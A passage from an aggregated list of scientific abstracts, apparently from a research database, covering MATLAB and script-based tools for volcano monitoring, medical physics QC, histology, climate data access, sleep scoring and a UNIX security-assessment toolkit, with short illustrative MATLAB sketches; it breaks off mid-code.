Patrick, M. R.; Orr, T. R.; Antolik, L.; Lee, R.; Kamibayashi, K.
2012-12-01
Webcams have become essential tools for continuous observation of ongoing volcanic activity. The use of both visual webcams and Web-connected thermal cameras has increased dramatically at the Hawaiian Volcano Observatory over the past five years, improving our monitoring capability and understanding of both Kilauea's summit eruption, which began in 2008, and the east rift zone eruption, which began in 1983. The recent bolstering of the webcam network builds upon the three sub-megapixel webcams that were in place five years ago. First, several additional fixed visual webcam systems have been installed, using multi-megapixel low-light cameras. Second, several continuously operating thermal cameras have been deployed, providing a new view of activity, easier detection of active flows, and often "seeing" through fume that completely obscures views from visual webcams. Third, a new type of "mobile" webcam - using cellular modem telemetry and capable of rapid deployment - has allowed us to respond quickly to changes in eruptive activity. Fourth, development of automated analysis and alerting scripts provide real-time products that aid in quantitative interpretation of incoming images. Finally, improvements in the archiving and Web-based display of images allow efficient review of current and recent images by observatory staff. Examples from Kilauea's summit and lava flow field provide more detail on the improvements. A thermal camera situated at Kilauea's summit has tracked the changes in the active lava lake in Halema`uma`u Crater since late 2010. Automated measurements from these images using Matlab scripts are now providing real-time quantitative data on lava level and, in some cases, lava crust velocity. Lava level essentially follows summit tilt over short time scales, in which near-daily cycles of deflation and inflation correspond with about ten meters of lava level drop and rise, respectively. The data also show that the long-term Halema`uma`u lava level tracked by the thermal cameras also correlates with the pressure state of the summit magma reservoir over months based on deformation data. Comparing the summit lava level with that in Pu`u `O`o crater, about 20 km distant on the east rift zone, reveals a clear correlation that reaffirms the hydraulic connection from summit to rift zone. Elsewhere on Kilauea, mobile webcams deployed on the coastal plain have improved the tracking of active breakouts from the east rift zone eruption site - a critical hazard zone given that four homes, mostly in the Kalapana area, have been destroyed by lava flows in the last three years. Each morning an automated Matlab script detects incandescent areas in overnight images and, using the known image geometry, determines the azimuth to active flows. The results of this eruptive "breakout locator" are emailed to observatory staff each morning and provide a quantitative constraint on breakout locations and hazard potential that serves as a valuable addition to routine field mapping. These examples show the utility of webcams and thermal cameras for monitoring volcanic activity, and they reinforce the importance of continued development of equipment as well as real-time processing and analysis tools.
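The overnight "breakout locator" step can be illustrated as a simple intensity threshold followed by a column-to-azimuth conversion using the known camera geometry. The threshold, field of view and pointing azimuth below are placeholders, not the operational values or code used at HVO.

    % Hedged sketch: detect incandescent pixels in a night-time webcam frame and
    % convert their image columns to azimuths. Geometry values are placeholders.
    img = imread('overnight_frame.jpg');               % illustrative file name
    red = double(img(:,:,1));                          % incandescence is red-dominated
    hot = red > 200 & double(img(:,:,3)) < 100;        % crude glow threshold

    [~, cols] = find(hot);
    if ~isempty(cols)
        nCols  = size(img, 2);
        fovDeg = 60;                                   % assumed horizontal field of view
        azCam  = 135;                                  % assumed camera pointing azimuth
        az = azCam + (cols - nCols/2) / nCols * fovDeg;
        fprintf('Active breakouts between azimuths %.1f and %.1f deg\n', min(az), max(az));
    end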
SMASH - semi-automatic muscle analysis using segmentation of histology: a MATLAB application.
Smith, Lucas R; Barton, Elisabeth R
2014-01-01
Histological assessment of skeletal muscle tissue is commonly applied to many areas of skeletal muscle physiological research. Histological parameters including fiber distribution, fiber type, centrally nucleated fibers, and capillary density are all frequently quantified measures of skeletal muscle. These parameters reflect functional properties of muscle and undergo adaptation in many muscle diseases and injuries. While standard operating procedures have been developed to guide analysis of many of these parameters, the software to freely, efficiently, and consistently analyze them is not readily available. In order to provide this service to the muscle research community we developed an open source MATLAB script to analyze immunofluorescent muscle sections incorporating user controls for muscle histological analysis. The software consists of multiple functions designed to provide tools for the analysis selected. Initial segmentation and fiber filter functions segment the image and remove non-fiber elements based on user-defined parameters to create a fiber mask. Establishing parameters set by the user, the software outputs data on fiber size and type, centrally nucleated fibers, and other structures. These functions were evaluated on stained soleus muscle sections from 1-year-old wild-type and mdx mice, a model of Duchenne muscular dystrophy. In accordance with previously published data, fiber size was not different between groups, but mdx muscles had much higher fiber size variability. The mdx muscle had a significantly greater proportion of type I fibers, but type I fibers did not change in size relative to type II fibers. Centrally nucleated fibers were highly prevalent in mdx muscle and were significantly larger than peripherally nucleated fibers. The MATLAB code described and provided along with this manuscript is designed for image processing of skeletal muscle immunofluorescent histological sections. The program allows for semi-automated fiber detection along with user correction. The output of the code provides data in accordance with established standards of practice. The results of the program have been validated using a small set of wild-type and mdx muscle sections. This program is the first freely available and open source image processing program designed to automate analysis of skeletal muscle histological sections.
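A stripped-down version of the initial segmentation and fiber-filter idea is sketched below: threshold the fiber-boundary channel, take the enclosed regions as fibers, and reject objects outside a user-defined size range. It is an illustration of the approach, not the SMASH code, and the channel assignment and area limits are assumptions.

    % Hedged sketch: segment muscle fibers from an immunofluorescent section in which
    % the boundary stain (e.g. laminin) is in the green channel. Limits are assumptions.
    img    = imread('soleus_section.tif');            % illustrative file name
    border = imbinarize(im2double(img(:,:,2)));       % fiber boundaries
    fibers = ~imdilate(border, strel('disk', 1));     % interiors between boundaries
    fibers = imclearborder(fibers);                   % drop fibers cut by the image edge

    stats = regionprops(fibers, 'Area', 'Centroid');
    areas = [stats.Area];
    keep  = areas > 200 & areas < 2e4;                % user-defined fiber size filter (px)

    fprintf('Fibers kept: %d; median area: %.0f px\n', nnz(keep), median(areas(keep)));
    histogram(areas(keep));  xlabel('Fiber area (pixels)');  ylabel('Count');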
SU-E-T-473: A Patient-Specific QC Paradigm Based On Trajectory Log Files and DICOM Plan Files
DOE Office of Scientific and Technical Information (OSTI.GOV)
DeMarco, J; McCloskey, S; Low, D
Purpose: To evaluate a remote QC tool for monitoring treatment machine parameters and treatment workflow. Methods: The Varian TrueBeam™ linear accelerator is a digital machine that records machine axis parameters and MLC leaf positions as a function of delivered monitor unit or control point. This information is saved to a binary trajectory log file for every treatment or imaging field in the patient treatment session. A MATLAB analysis routine was developed to parse the trajectory log files for a given patient, compare the expected versus actual machine and MLC positions, and perform a cross-comparison with the DICOM-RT plan file exported from the treatment planning system. The parsing routine sorts the trajectory log files based on the time and date stamp and generates a sequential report file listing treatment parameters and provides a match relative to the DICOM-RT plan file. Results: The trajectory log parsing routine was compared against a standard record-and-verify listing for patients undergoing initial IMRT dosimetry verification and weekly and final chart QC. The complete treatment course was independently verified for 10 patients of varying treatment sites, and a total of 1267 treatment fields were evaluated, including pre-treatment imaging fields where applicable. In the context of IMRT plan verification, eight prostate SBRT plans with 4 arcs per plan were evaluated based on expected versus actual machine axis parameters. The average value for the maximum RMS MLC error was 0.067 ± 0.001 mm and 0.066 ± 0.002 mm for leaf banks A and B, respectively. Conclusion: A real-time QC analysis program was tested using trajectory log files and DICOM-RT plan files. The parsing routine is efficient and able to evaluate all relevant machine axis parameters during a patient treatment course, including MLC leaf positions and table positions at the time of image acquisition and during treatment.
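Once the expected and actual leaf positions have been read from a trajectory log, the RMS comparison reported above is a one-liner per leaf bank. The sketch below assumes the positions have already been parsed into two (control points x leaves) matrices; the binary log parsing itself, which follows Varian's published TrueBeam log format, is omitted, and the input files are placeholders.

    % Hedged sketch: RMS leaf-position error per leaf and its maximum over a bank,
    % given parsed expected/actual MLC positions (control points x leaves), in mm.
    expectedA = load('bankA_expected.txt');    % placeholder inputs; parsing not shown
    actualA   = load('bankA_actual.txt');

    err     = actualA - expectedA;             % per-control-point, per-leaf deviation
    rmsLeaf = sqrt(mean(err.^2, 1));           % RMS over all control points, per leaf
    maxRms  = max(rmsLeaf);                    % the per-bank value reported in the abstract
    fprintf('Bank A: max RMS leaf error = %.3f mm\n', maxRms);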
User-Friendly Data Servers for Climate Studies at the Asia-Pacific Data-Research Center (APDRC)
NASA Astrophysics Data System (ADS)
Yuan, G.; Shen, Y.; Zhang, Y.; Merrill, R.; Waseda, T.; Mitsudera, H.; Hacker, P.
2002-12-01
The APDRC was recently established within the International Pacific Research Center (IPRC) at the University of Hawaii. The APDRC mission is to increase understanding of climate variability in the Asia-Pacific region by developing the computational, data-management, and networking infrastructure necessary to make data resources readily accessible and usable by researchers, and by undertaking data-intensive research activities that will both advance knowledge and lead to improvements in data preparation and data products. A focus of recent activity is the implementation of user-friendly data servers. The APDRC is currently running a Live Access Server (LAS) developed at NOAA/PMEL to provide access to and visualization of gridded climate products via the web. The LAS also allows users to download the selected data subsets in various formats (such as binary, netCDF and ASCII). Most of the datasets served by the LAS are also served through our OPeNDAP server (formerly DODS), which allows users to directly access the data using their desktop client tools (e.g. GrADS, Matlab and Ferret). In addition, the APDRC is running an OPeNDAP Catalog/Aggregation Server (CAS) developed by Unidata at UCAR to serve climate data and products such as model output and satellite-derived products. These products are often large (> 2 GB) and are therefore stored as multiple files (stored separately in time or in parameters). The CAS remedies the inconvenience of multiple files and allows access to the whole dataset (or any subset that cuts across the multiple files) via a single request command from any DODS enabled client software. Once the aggregation of files is configured at the server (CAS), the process of aggregation is transparent to the user. The user only needs to know a single URL for the entire dataset, which is, in fact, stored as multiple files. CAS even allows aggregation of files on different systems and at different locations. Currently, the APDRC is serving NCEP, ECMWF, SODA, WOCE-Satellite, TMI, GPI and GSSTF products through the CAS. The APDRC is also running an EPIC server developed by PMEL/NOAA. EPIC is a web-based, data search and display system suited for in situ (station versus gridded) data. The process of locating and selecting individual station data from large collections (millions of profiles or time series, etc.) of in situ data is a major challenge. Serving in situ data on the Internet faces two problems: the irregularity of data formats; and the large quantity of data files. To solve the first problem, we have converted the in situ data into netCDF data format. The second problem was solved by using the EPIC server, which allows users to easily subset the files using a friendly graphical interface. Furthermore, we enhanced the capability of EPIC and configured OPeNDAP into EPIC to serve the numerous in situ data files and to export them to users through two different options: 1) an OPeNDAP pointer file of user-selected data files; and 2) a data package that includes meta-information (e.g., location, time, cruise no, etc.), a local pointer file, and the data files that the user selected. Option 1) is for those who do not want to download the selected data but want to use their own application software (such as GrADS, Matlab and Ferret) for access and analysis; option 2) is for users who want to store the data on their own system (e.g. laptops before going for a cruise) for subsequent analysis. 
Currently, WOCE CTD and bottle data, the WOCE current meter data, and some Argo float data are being served on the EPIC server.
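Because MATLAB's NetCDF reader accepts OPeNDAP URLs directly, accessing an aggregated dataset served this way needs only the single dataset URL described above. The URL and variable names in the sketch are placeholders, not actual APDRC endpoints.

    % Hedged sketch: read a subset of an aggregated dataset straight from an OPeNDAP
    % server with ncread. The URL and variable names below are placeholders.
    url = 'http://example.org/dods/sample_sst_aggregation';   % hypothetical endpoint
    ncdisp(url);                                              % list variables and sizes

    % Read a 10 x 10 lon/lat tile for the first 12 time steps of an SST variable:
    sst = ncread(url, 'sst', [1 1 1], [10 10 12]);
    lon = ncread(url, 'lon', 1, 10);
    lat = ncread(url, 'lat', 1, 10);
    pcolor(lon, lat, sst(:,:,1)');  shading flat;  colorbar;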
NASA Astrophysics Data System (ADS)
Sansivero, Fabio; Vilardo, Giuseppe; Caputo, Teresa
2017-04-01
The permanent thermal infrared surveillance network of Osservatorio Vesuviano (INGV) is composed of 6 stations which acquire IR frames of fumarole fields in the Campi Flegrei caldera and inside the Vesuvius crater (Italy). The IR frames are uploaded to a dedicated server in the Surveillance Center of Osservatorio Vesuviano in order to process the infrared data and to extract all the information they contain. In a first phase the infrared data are processed by an automated system (A.S.I.R.A. Acq - Automated System of IR Analysis and Acquisition) developed in the Matlab environment with a user-friendly graphical user interface (GUI). ASIRA daily generates time series of residual temperature values of the maximum temperatures observed in the IR scenes after the removal of seasonal effects. These time series are displayed in the Surveillance Room of Osservatorio Vesuviano and provide information about the evolution of the shallow temperature field in the observed areas. In particular, the features of ASIRA Acq include: a) efficient quality selection of IR scenes, b) co-registration of IR images with respect to a reference frame, c) seasonal correction using a background-removal methodology, and d) filing of IR matrices and of the processed data in shared archives accessible to interrogation. The daily archived records can also be processed by ASIRA Plot (Matlab code with a GUI) to visualize IR data time series and to help in evaluating input parameters for further data processing and analysis. Additional processing features are accomplished in a second phase by ASIRA Tools, Matlab code with a GUI developed to extract further information from the dataset in an automated way. The main functions of ASIRA Tools are: a) analysis of the temperature variations of each pixel of the IR frame in a given time interval, b) removal of seasonal effects from the temperature of every pixel in the IR frames using an analytic approach (removal of the sinusoidal long-term seasonal component by a polynomial fit Matlab function, LTFC_SCOREF), and c) export of data in different raster formats (e.g. Surfer grd). An interesting example of the elaborations produced by ASIRA Tools is the map of the temperature changing rate, which provides remarkable information about the potential migration of fumarole activity. The high efficiency of Matlab in processing matrix data from IR scenes and the flexibility of this code-development tool proved to be very useful for producing applications for volcanic surveillance aimed at monitoring the evolution of the surface temperature field in diffuse degassing volcanic areas.
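The background-removal idea, fitting and subtracting an annual sinusoid plus a slow drift from each pixel's (or each scene maximum's) temperature series, can be written as a small least-squares problem. The sketch below is a generic illustration with synthetic data and hypothetical variable names, not the LTFC_SCOREF routine itself.

    % Hedged sketch: remove an annual sinusoid plus a linear drift from a daily
    % maximum-temperature series by ordinary least squares. Names are illustrative.
    t    = (0:1499)';                          % day index of each IR acquisition
    Tmax = 95 + 3*sin(2*pi*t/365.25 + 0.6) + 0.002*t + 0.5*randn(size(t));  % fake data

    % Design matrix: constant, linear trend, annual sine and cosine terms
    A = [ones(size(t)), t, sin(2*pi*t/365.25), cos(2*pi*t/365.25)];
    c = A \ Tmax;                              % least-squares coefficients
    residualT = Tmax - A*c;                    % deseasoned residual temperature

    plot(t, residualT);
    xlabel('Day');  ylabel('Residual T_{max} (°C)');
    title('Seasonally corrected maximum temperature (illustrative)');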
DOE Office of Scientific and Technical Information (OSTI.GOV)
Bartoletti, T.
SPI/U3.1 consists of five tools used to assess and report the security posture of computers running the UNIX operating system. The tools are: Access Control Test: A rule-based system which identifies sequential dependencies in UNIX access controls. Binary Inspector Tool: Evaluates the release status of system binaries by comparing a crypto-checksum to provided table entries. Change Detection Tool: Maintains and applies a snapshot of critical system files and attributes for purposes of change detection. Configuration Query Language: Accepts CQL-based scripts (provided) to evaluate queries over the status of system files, configuration of services and many other elements of UNIX system security. Password Security Inspector: Tests for weak or aged passwords. The tools are packaged with a forms-based user interface providing on-line context-sensitive help, job scheduling, parameter management and output report management utilities. Tools may be run independently of the UI.
DOE Office of Scientific and Technical Information (OSTI.GOV)
Bartoletti, Tony
SPI/U3.2 consists of five tools used to assess and report the security posture of computers running the UNIX operating system. The tools are: Access Control Test: A rule-based system which identifies sequential dependencies in UNIX access controls. Binary Authentication Tool: Evaluates the release status of system binaries by comparing a crypto-checksum to provided table entries. Change Detection Tool: Maintains and applies a snapshot of critical system files and attributes for purposes of change detection. Configuration Query Language: Accepts CQL-based scripts (provided) to evaluate queries over the status of system files, configuration of services and many other elements of UNIX system security. Password Security Inspector: Tests for weak or aged passwords. The tools are packaged with a forms-based user interface providing on-line context-sensitive help, job scheduling, parameter management and output report management utilities. Tools may be run independently of the UI.
Serial femtosecond crystallography datasets from G protein-coupled receptors
White, Thomas A.; Barty, Anton; Liu, Wei; Ishchenko, Andrii; Zhang, Haitao; Gati, Cornelius; Zatsepin, Nadia A.; Basu, Shibom; Oberthür, Dominik; Metz, Markus; Beyerlein, Kenneth R.; Yoon, Chun Hong; Yefanov, Oleksandr M.; James, Daniel; Wang, Dingjie; Messerschmidt, Marc; Koglin, Jason E.; Boutet, Sébastien; Weierstall, Uwe; Cherezov, Vadim
2016-01-01
We describe the deposition of four datasets consisting of X-ray diffraction images acquired using serial femtosecond crystallography experiments on microcrystals of human G protein-coupled receptors, grown and delivered in lipidic cubic phase, at the Linac Coherent Light Source. The receptors are: the human serotonin receptor 2B in complex with an agonist ergotamine, the human δ-opioid receptor in complex with a bi-functional peptide ligand DIPP-NH2, the human smoothened receptor in complex with an antagonist cyclopamine, and finally the human angiotensin II type 1 receptor in complex with the selective antagonist ZD7155. All four datasets have been deposited, with minimal processing, in an HDF5-based file format, which can be used directly for crystallographic processing with CrystFEL or other software. We have provided processing scripts and supporting files for recent versions of CrystFEL, which can be used to validate the data. PMID:27479354
PROVAT: a tool for Voronoi tessellation analysis of protein structures and complexes.
Gore, Swanand P; Burke, David F; Blundell, Tom L
2005-08-01
Voronoi tessellation has proved to be a useful tool in protein structure analysis. We have developed PROVAT, a versatile public-domain software package that enables computation and visualization of Voronoi tessellations of proteins and protein complexes. It is a set of Python scripts that integrate freely available specialized software (Qhull, Pymol, etc.) into a pipeline. The calculation component of the tool computes the Voronoi tessellation of a given protein system in a way described by a user-supplied XML recipe and stores the resulting neighbourhood information as text files in various styles. The Python pickle file generated in the process is used by the visualization component, a Pymol plug-in that offers a GUI to explore the tessellation visually. PROVAT source code can be downloaded from http://raven.bioc.cam.ac.uk/~swanand/Provat1, which also provides a webserver for its calculation component, documentation and examples.
SPI/U3.2. Security Profile Inspector for UNIX Systems
DOE Office of Scientific and Technical Information (OSTI.GOV)
Bartoletti, A.
1994-08-01
SPI/U3.2 consists of five tools used to assess and report the security posture of computers running the UNIX operating system. The tools are: Access Control Test: A rule-based system which identifies sequential dependencies in UNIX access controls. Binary Authentication Tool: Evaluates the release status of system binaries by comparing a crypto-checksum to provided table entries. Change Detection Tool: Maintains and applies a snapshot of critical system files and attributes for purposes of change detection. Configuration Query Language: Accepts CQL-based scripts (provided) to evaluate queries over the status of system files, configuration of services and many other elements of UNIX system security. Password Security Inspector: Tests for weak or aged passwords. The tools are packaged with a forms-based user interface providing on-line context-sensitive help, job scheduling, parameter management and output report management utilities. Tools may be run independently of the UI.
Serial femtosecond crystallography datasets from G protein-coupled receptors.
White, Thomas A; Barty, Anton; Liu, Wei; Ishchenko, Andrii; Zhang, Haitao; Gati, Cornelius; Zatsepin, Nadia A; Basu, Shibom; Oberthür, Dominik; Metz, Markus; Beyerlein, Kenneth R; Yoon, Chun Hong; Yefanov, Oleksandr M; James, Daniel; Wang, Dingjie; Messerschmidt, Marc; Koglin, Jason E; Boutet, Sébastien; Weierstall, Uwe; Cherezov, Vadim
2016-08-01
We describe the deposition of four datasets consisting of X-ray diffraction images acquired using serial femtosecond crystallography experiments on microcrystals of human G protein-coupled receptors, grown and delivered in lipidic cubic phase, at the Linac Coherent Light Source. The receptors are: the human serotonin receptor 2B in complex with an agonist ergotamine, the human δ-opioid receptor in complex with a bi-functional peptide ligand DIPP-NH2, the human smoothened receptor in complex with an antagonist cyclopamine, and finally the human angiotensin II type 1 receptor in complex with the selective antagonist ZD7155. All four datasets have been deposited, with minimal processing, in an HDF5-based file format, which can be used directly for crystallographic processing with CrystFEL or other software. We have provided processing scripts and supporting files for recent versions of CrystFEL, which can be used to validate the data.
CircosVCF: circos visualization of whole-genome sequence variations stored in VCF files.
Drori, E; Levy, D; Smirin-Yosef, P; Rahimi, O; Salmon-Divon, M
2017-05-01
Visualization of whole-genomic variations in a meaningful manner assists researchers in gaining new insights into the underlying data, especially in the context of whole genome comparisons. CircosVCF is a web-based visualization tool for genome-wide variant data described in VCF files, using Circos plots. The user-friendly interface of CircosVCF supports an interactive design of the circles in the plot, and the integration of additional information such as experimental data or annotations. The provided visualization capabilities give a broad overview of the genomic relationships between genomes, and allow identification of specific meaningful SNP regions. CircosVCF was implemented in JavaScript and is available at http://www.ariel.ac.il/research/fbl/software. Contact: malisa@ariel.ac.il. Supplementary data are available at Bioinformatics online.
Poster — Thur Eve — 55: An automated XML technique for isocentre verification on the Varian TrueBeam
DOE Office of Scientific and Technical Information (OSTI.GOV)
Asiev, Krum; Mullins, Joel; DeBlois, François
2014-08-15
Isocentre verification tests, such as the Winston-Lutz (WL) test, have gained popularity in recent years as stereotactic radiosurgery/radiotherapy (SRS/SRT) treatments are more commonly performed on radiotherapy linacs. These highly conformal treatments require frequent monitoring of the geometrical accuracy of the isocentre to ensure proper radiation delivery. At our clinic, the WL test is performed by acquiring with the EPID a collection of 8 images of a WL phantom fixed on the couch for various couch/gantry angles. This set of images is later analyzed to determine the isocentre size. The current work addresses the acquisition process. A manual WL test acquisition performed by an experienced physicist takes on average 25 minutes and is prone to user manipulation errors. We have automated this acquisition on a Varian TrueBeam STx linac (Varian, Palo Alto, USA). The Varian developer mode allows the execution of custom-made XML script files to control all aspects of the linac operation. We have created an XML-WL script that cycles through each couch/gantry combination, taking an EPID image at each position. This automated acquisition is done in less than 4 minutes. The reproducibility of the method was verified by repeating the execution of the XML file 5 times. The analysis of the images showed variations of the isocentre size of less than 0.1 mm along the X, Y and Z axes, which compares favorably to a manual acquisition, for which we typically observe variations of up to 0.5 mm.
Advanced Small Modular Reactor Economics Model Development
DOE Office of Scientific and Technical Information (OSTI.GOV)
Harrison, Thomas J.
2014-10-01
The US Department of Energy Office of Nuclear Energy's Advanced Small Modular Reactor (SMR) research and development activities focus on four key areas: developing assessment methods for evaluating advanced SMR technologies and characteristics; developing and testing materials, fuels and fabrication techniques; resolving key regulatory issues identified by the US Nuclear Regulatory Commission and industry; and developing advanced instrumentation and controls and human-machine interfaces. This report focuses on the development of assessment methods to evaluate advanced SMR technologies and characteristics. Specifically, this report describes the expansion and application of the economic modeling effort at Oak Ridge National Laboratory. Analysis of the current modeling methods shows that one of the primary concerns for the modeling effort is the handling of uncertainty in cost estimates. Monte Carlo-based methods are commonly used to handle uncertainty, especially when implemented by a stand-alone script within a program such as Python or MATLAB. However, a script-based model requires each potential user to have access to a compiler and an executable capable of handling the script. Making the model accessible to multiple independent analysts is best accomplished by implementing the model in a common computing tool such as Microsoft Excel. Excel is readily available and accessible to most system analysts, but it is not designed for straightforward implementation of a Monte Carlo-based method. Using a Monte Carlo algorithm requires in-spreadsheet scripting and statistical analyses or the use of add-ons such as Crystal Ball. An alternative method uses propagation of error calculations in the existing Excel-based system to estimate system cost uncertainty. This method has the advantage of using Microsoft Excel as is, but it requires the use of simplifying assumptions. These assumptions do not necessarily bring into question the analytical results. In fact, the analysis shows that the propagation of error method introduces essentially negligible error, especially when compared to the uncertainty associated with some of the estimates themselves. The results of these uncertainty analyses generally quantify and identify the sources of uncertainty in the overall cost estimation. The obvious generalization, that capital cost uncertainty is the main driver, can be shown to be an accurate generalization for the current state of reactor cost analysis. However, the detailed analysis on a component-by-component basis helps to demonstrate which components would benefit most from research and development to decrease the uncertainty, as well as which components would benefit from research and development to decrease the absolute cost.
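As a hedged illustration of the comparison discussed above (the component costs and uncertainties are made up; this is not the ORNL model), a few lines of MATLAB contrast the propagation-of-error estimate with a Monte Carlo estimate for a simple sum of independent cost components:

    mu    = [2500, 600, 300, 150];                  % hypothetical mean component costs [$M]
    sigma = [ 500,  90,  45,  15];                  % hypothetical 1-sigma uncertainties [$M]
    sigma_prop = sqrt(sum(sigma.^2));               % propagation of error for a linear sum
    N = 1e5;                                        % Monte Carlo with normal components
    samples  = repmat(mu, N, 1) + randn(N, numel(mu)) .* repmat(sigma, N, 1);
    sigma_mc = std(sum(samples, 2));
    fprintf('propagation of error: %.0f   Monte Carlo: %.0f\n', sigma_prop, sigma_mc);

For independent, roughly normal components the two estimates agree closely, which is the sense in which the propagation-of-error shortcut introduces essentially negligible error.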
Verification Testing: Meet User Needs Figure of Merit
NASA Technical Reports Server (NTRS)
Kelly, Bryan W.; Welch, Bryan W.
2017-01-01
Verification is the process through which Modeling and Simulation (M&S) software goes to ensure that it has been rigorously tested and debugged for its intended use. Validation confirms that said software accurately models and represents the real-world system. Credibility gives an assessment of the development and testing effort that the software has gone through, as well as how accurate and reliable test results are. Together, these three components form Verification, Validation, and Credibility (VV&C), the process by which all NASA modeling software is to be tested to ensure that it is ready for implementation. NASA created this process following the CAIB (Columbia Accident Investigation Board) report seeking to understand the reasons the Columbia space shuttle failed during reentry. The report's conclusion was that the accident was fully avoidable; however, among other issues, the data necessary to make an informed decision were not available, and the result was the complete loss of the shuttle and crew. In an effort to mitigate this problem, NASA put out its Standard for Models and Simulations, currently in version NASA-STD-7009A, in which it detailed recommendations, requirements and rationale for the different components of VV&C. The intention was that this would allow people receiving M&S software to clearly understand the past development effort and have data from it. This in turn would allow people who had not worked with the M&S software before to move forward with greater confidence and efficiency in their work. This particular project looks to perform Verification on several MATLAB (registered trademark of The MathWorks, Inc.) scripts that will later be implemented in a website interface. It seeks to note and define the limits of operation, the units and significance, and the expected datatype and format of the inputs and outputs of each of the scripts. This is intended to prevent the code from attempting to make incorrect or impossible calculations. Additionally, this project will look at the coding generally and note inconsistencies, redundancies, and other aspects that may become problematic or slow down the code's run time. Certain scripts lacking documentation will also be commented and cataloged.
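A minimal MATLAB sketch of the kind of input checking such a verification effort documents, declaring limits of operation, units and expected datatypes, is shown below; the function, its parameters and its limits are purely illustrative and are not taken from the scripts described above:

    function margin = linkMargin(eirp_dBW, range_km, freq_GHz)
        % eirp_dBW : scalar double, effective isotropic radiated power [dBW]
        validateattributes(eirp_dBW, {'double'}, {'scalar','finite'});
        % range_km : scalar double, slant range, limited here to 100..500000 km
        validateattributes(range_km, {'double'}, {'scalar','>=',100,'<=',5e5});
        % freq_GHz : scalar double, carrier frequency, limited here to 0.1..60 GHz
        validateattributes(freq_GHz, {'double'}, {'scalar','>',0.1,'<',60});
        fspl   = 92.45 + 20*log10(range_km) + 20*log10(freq_GHz);  % free-space path loss [dB]
        margin = eirp_dBW - fspl;                                  % simplified margin [dB]
    end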
Geologic map of the San Bernardino North 7.5' quadrangle, San Bernardino County, California
Miller, F.K.; Matti, J.C.
2001-01-01
3. Portable Document Format (.pdf) files of: a. This Readme; includes an Appendix, containing data found in sbnorth_met.txt . b. The Description of Map Units identical to that found on the plot of the PostScript file. c. The same graphic as plotted in 2 above. (Test plots from this .pdf do not produce 1:24,000-scale maps. Use Adobe Acrobat pagesize setting to control map scale.) The Correlation of Map Units and Description of Map Units is in the editorial format of USGS Miscellaneous Investigations Series (I-series) maps. Within the geologic map data package, map units are identified by standard geologic map criteria such as formation-name, age, and lithology. Even though this is an author-prepared report, every attempt has been made to closely adhere to the stratigraphic nomenclature of the U. S. Geological Survey. Descriptions of units can be obtained by viewing or plotting the .pdf file (3b above) or plotting the postscript file (2 above). If roads in some areas, especially forest roads that parallel topographic contours, do not show well on plots of the geologic map, we recommend use of the USGS San Bernardino North 7.5’ topographic quadrangle in conjunction with the geologic map.
SU-E-T-142: Automatic Linac Log File: Analysis and Reporting
DOE Office of Scientific and Technical Information (OSTI.GOV)
Gainey, M; Rothe, T
Purpose: End-to-end QA for IMRT/VMAT is time-consuming. Automated linac log file analysis and recalculation of the daily recorded fluence, and hence dose, distributions bring this closer. Methods: Matlab (R2014b, Mathworks) software was written to read in and analyse IMRT/VMAT trajectory log files (TrueBeam 1.5, Varian Medical Systems) overnight; the files are archived on a backed-up network drive. A summary report (PDF) is sent by email to the duty linac physicist. A structured summary report (PDF) for each patient is automatically updated for embedding into the R&V system (Mosaiq 2.5, Elekta AG). The report contains cross-referenced hyperlinks to ease navigation between treatment fractions. Gamma analysis can be performed on planned (DICOM RTPlan) and treated (trajectory log) fluence distributions. Trajectory log files can be converted into RTPlan files for dose distribution calculation (Eclipse, AAA10.0.28, VMS). Results: All leaf positions are within ±0.10 mm: 57% within ±0.01 mm; 89% within ±0.05 mm. The mean leaf position deviation is 0.02 mm. Gantry angle variations lie in the range −0.1 to 0.3 degrees, with a mean of 0.04 degrees. Fluence verification shows excellent agreement between planned and treated fluence. Agreement between the planned dose distribution and the treated dose distribution derived from the log files is very good. Conclusion: Automated log file analysis is a valuable tool for the busy physicist, enabling potential treated fluence distribution errors to be quickly identified. In the near future we will correlate trajectory log analysis with routine IMRT/VMAT QA analysis. This has the potential to reduce, but not eliminate, the QA workload.
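An illustrative MATLAB fragment (not the authors' code) shows how leaf-position statistics of the kind reported above can be summarised once expected and actual MLC leaf positions have been read from a trajectory log (rows are control-point samples, columns are leaves, units mm; the matrices below are placeholders):

    expected = randn(200, 120) * 30;             % placeholder planned leaf positions [mm]
    actual   = expected + 0.02*randn(200, 120);  % placeholder delivered leaf positions [mm]
    dev = actual - expected;                     % per-leaf, per-sample deviation [mm]
    fprintf('mean deviation: %.3f mm\n', mean(dev(:)));
    fprintf('within +/-0.01 mm: %.0f%%\n', 100*mean(abs(dev(:)) <= 0.01));
    fprintf('within +/-0.05 mm: %.0f%%\n', 100*mean(abs(dev(:)) <= 0.05));
    fprintf('within +/-0.10 mm: %.0f%%\n', 100*mean(abs(dev(:)) <= 0.10));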
Gross, Brooks A.; Walsh, Christine M.; Turakhia, Apurva A.; Booth, Victoria; Mashour, George; Poe, Gina R.
2009-01-01
Manual state scoring of physiological recordings in sleep studies is time-consuming, resulting in a data backlog, research delays and increased personnel costs. We developed MATLAB-based software to automate scoring of sleep/waking states in rats, potentially extendable to other animals, from a variety of recording systems. The software contains two programs, Sleep Scorer and Auto-Scorer, for manual and automated scoring. Auto-Scorer is a logic-based program that displays power spectral densities of an electromyographic signal and the σ, δ, and θ frequency bands of an electroencephalographic signal, along with the δ/θ ratio and σ×θ, for every epoch. The user defines thresholds from the state definitions in a training file, which Auto-Scorer then uses with its logic to discriminate the state of every epoch in the file. Auto-Scorer was evaluated by comparing its output to manually scored files from 6 rats under 2 experimental conditions by 3 users. Each user generated a training file, set thresholds, and autoscored the 12 files into 4 states (waking, non-REM, transition-to-REM, and REM sleep) in ¼ the time required to manually score the files. Overall performance comparisons between Auto-Scorer and manual scoring resulted in a mean agreement of 80.24 ± 7.87%, comparable to the average agreement among 3 manual scorers (83.03 ± 4.00%). There was no significant difference between user-user and user-Auto-Scorer agreement ratios. These results support the use of our open-source Auto-Scorer, coupled with user review, to rapidly and accurately score sleep/waking states from rat recordings. PMID:19615408
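A simplified MATLAB sketch of the threshold logic described above (not the released Auto-Scorer source; the per-epoch band powers and the thresholds, which in the real program come from a user-scored training file, are placeholders):

    nEpochs = 100;
    emg   = rand(nEpochs,1);  delta = rand(nEpochs,1);   % placeholder per-epoch features
    theta = rand(nEpochs,1);  sigma = rand(nEpochs,1);
    emgThr = 0.6; dtThr = 1.2; stThr = 0.5;              % thresholds from a training file
    state = cell(nEpochs,1);
    for k = 1:nEpochs
        if emg(k) > emgThr
            state{k} = 'waking';                         % high muscle tone
        elseif delta(k)/theta(k) > dtThr
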